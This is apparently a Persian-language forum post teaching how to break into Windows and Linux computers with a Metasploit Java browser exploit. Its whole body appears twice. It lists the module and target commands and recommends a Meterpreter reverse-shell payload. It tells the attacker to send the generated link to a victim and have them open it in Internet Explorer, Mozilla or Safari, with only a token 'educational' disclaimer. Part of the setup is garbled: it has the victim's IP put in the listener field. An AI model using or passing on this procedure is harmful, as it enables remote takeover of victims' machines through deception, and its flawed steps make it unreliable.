توییت
با سلام به همه دوستان .
امروز میخوام براتون نفوذ با باگ جدید و خطرناکی که تو Java هست رو نشون بدم و البته این باگ کاره خیلی ساده ای هست چون اکسپلویتش تو MetaSploit اومده و من فقط اکسپلویتش و طرز استفادش رو میگم.
خوب یه توضیحی در مورد باگ بدم که هم در سیستم عامل لینوکس و هم در ویندوز جواب میده که خوب این نشان از خطر ناک بودن باگ رو میده.
نکته: اول از همه متااسپلویت خود را آپدیت کنید
نام اکسپلویت ::::
[PHP]exploit/multi/browser/java_jre17_exec[/PHP]
نام پای لود :::: که بستگی داره شما میخوهاید به لینوکس یا ویندوز نفوذ کنید....
برای مشخص کردن این که ما میخواهم به کدام سیستم عامل نفوذ کنیم باید این Commmand را Run کنیم.
برای ویندوز:::
[PHP]set target 1[/PHP]
برای لینوکس::::
[PHP]set target 2[/PHP]
خوب حالا باید اسم پایلود خود را مشخص کنیم....
که در ادامه توضیح میدم.
_____________________________________
خوب حالا تمامی کامند هایی که زدیم رو مرور میکنیم.
اول از همه این::::
1-[PHP]use exploit/multi/browser/java_jre17_exec[/PHP]
بعد هم باید ip خودمون را ست کنیم.
2-[PHP]set srvhost (Ip Sistem Shoam Ya Hamon Attacker)[/PHP]
حالا باید نوع سیستم عامل رو مشخص کنیم.
3-[PHP]show targets[/PHP]
4- اگر ما مخواهیم به وین حمله کنیم این راهو پیس میریم.
اول اینجوری ست میکنیم رو ویندوز :::
[PHP]set target 1[/PHP]
برای نمایش پایلود های مربوط به وین این کامند را ران میکنیم.
[PHP]show payloads[/PHP]
که بسته به کارمون پایلود مربوطه رو انتخاب میکنیم. که اگر میخواهید از تارگت خودتون شل بگیرید من این پایلود رو به شما پیشنهاد میکنم. [PHP]set payload windows/meterpreter/reverse_tcp[/PHP]
5- اگر هم میخواهیم به لینوکس نفوذ کنیم این راهو پیش میریم.
اول برای ست کردن رو لینوکس این کامند رو ران میکنی.
[PHP]set target 2[/PHP]
خوب حالا برای نمایش پایلود های مربوط به لینوکس این کامند را ران میکنیم.
[PHP]show payloads[/PHP]
و برای ست کرن پایلود مورد نطر این کامند::::
[PHP]set payload (khodeton entekhab konid )[/PHP]
6- حالا بعد از اینکه پایلود خودمون ست کردیم. باید IP قربانی رو ست کنیم.
[PHP]set lhost (ip ghorbani)[/PHP]
7-حالا بعد از این کارها کامند [PHP]exploit[/PHP] را ران میکنیم.
خوب الان به ما یک لینک میده که IP ما هست و تهش یه عبارت رندم اما اونم میتونید تنظیم میکنیم.
اون لینک رو میدیم به قربانی که بسته به پایلودمون ازش بهره میبریم...
نکته: این آسیب پذیی تو IE,MOZILA,SAFARI هست پس بهتره به قربانی بگید که با این مرورگر ها باز کنه.
نکته:::: این آموزش صرفا جنبه آموزشی برای نشان دادن این آسیب پذیری است و سو استفاده از آن بر عهده فرد میباشد
نکته:::::: حتما قبل از استفاده آن را اپدینت کنید.
سعی کردم که هم کسایی که یکم با بک ترک کار نکردن راه بیوفتن
تشــــــــــــــــــکر نشانه رضایت شماست
امروز میخوام براتون نفوذ با باگ جدید و خطرناکی که تو Java هست رو نشون بدم و البته این باگ کاره خیلی ساده ای هست چون اکسپلویتش تو MetaSploit اومده و من فقط اکسپلویتش و طرز استفادش رو میگم.
خوب یه توضیحی در مورد باگ بدم که هم در سیستم عامل لینوکس و هم در ویندوز جواب میده که خوب این نشان از خطر ناک بودن باگ رو میده.
نکته: اول از همه متااسپلویت خود را آپدیت کنید
نام اکسپلویت ::::
[PHP]exploit/multi/browser/java_jre17_exec[/PHP]
نام پای لود :::: که بستگی داره شما میخوهاید به لینوکس یا ویندوز نفوذ کنید....
برای مشخص کردن این که ما میخواهم به کدام سیستم عامل نفوذ کنیم باید این Commmand را Run کنیم.
برای ویندوز:::
[PHP]set target 1[/PHP]
برای لینوکس::::
[PHP]set target 2[/PHP]
خوب حالا باید اسم پایلود خود را مشخص کنیم....
که در ادامه توضیح میدم.
_____________________________________
خوب حالا تمامی کامند هایی که زدیم رو مرور میکنیم.
اول از همه این::::
1-[PHP]use exploit/multi/browser/java_jre17_exec[/PHP]
بعد هم باید ip خودمون را ست کنیم.
2-[PHP]set srvhost (Ip Sistem Shoam Ya Hamon Attacker)[/PHP]
حالا باید نوع سیستم عامل رو مشخص کنیم.
3-[PHP]show targets[/PHP]
4- اگر ما مخواهیم به وین حمله کنیم این راهو پیس میریم.
اول اینجوری ست میکنیم رو ویندوز :::
[PHP]set target 1[/PHP]
برای نمایش پایلود های مربوط به وین این کامند را ران میکنیم.
[PHP]show payloads[/PHP]
که بسته به کارمون پایلود مربوطه رو انتخاب میکنیم. که اگر میخواهید از تارگت خودتون شل بگیرید من این پایلود رو به شما پیشنهاد میکنم. [PHP]set payload windows/meterpreter/reverse_tcp[/PHP]
5- اگر هم میخواهیم به لینوکس نفوذ کنیم این راهو پیش میریم.
اول برای ست کردن رو لینوکس این کامند رو ران میکنی.
[PHP]set target 2[/PHP]
خوب حالا برای نمایش پایلود های مربوط به لینوکس این کامند را ران میکنیم.
[PHP]show payloads[/PHP]
و برای ست کرن پایلود مورد نطر این کامند::::
[PHP]set payload (khodeton entekhab konid )[/PHP]
6- حالا بعد از اینکه پایلود خودمون ست کردیم. باید IP قربانی رو ست کنیم.
[PHP]set lhost (ip ghorbani)[/PHP]
7-حالا بعد از این کارها کامند [PHP]exploit[/PHP] را ران میکنیم.
خوب الان به ما یک لینک میده که IP ما هست و تهش یه عبارت رندم اما اونم میتونید تنظیم میکنیم.
اون لینک رو میدیم به قربانی که بسته به پایلودمون ازش بهره میبریم...
نکته: این آسیب پذیی تو IE,MOZILA,SAFARI هست پس بهتره به قربانی بگید که با این مرورگر ها باز کنه.
نکته:::: این آموزش صرفا جنبه آموزشی برای نشان دادن این آسیب پذیری است و سو استفاده از آن بر عهده فرد میباشد
نکته:::::: حتما قبل از استفاده آن را اپدینت کنید.
سعی کردم که هم کسایی که یکم با بک ترک کار نکردن راه بیوفتن
تشــــــــــــــــــکر نشانه رضایت شماست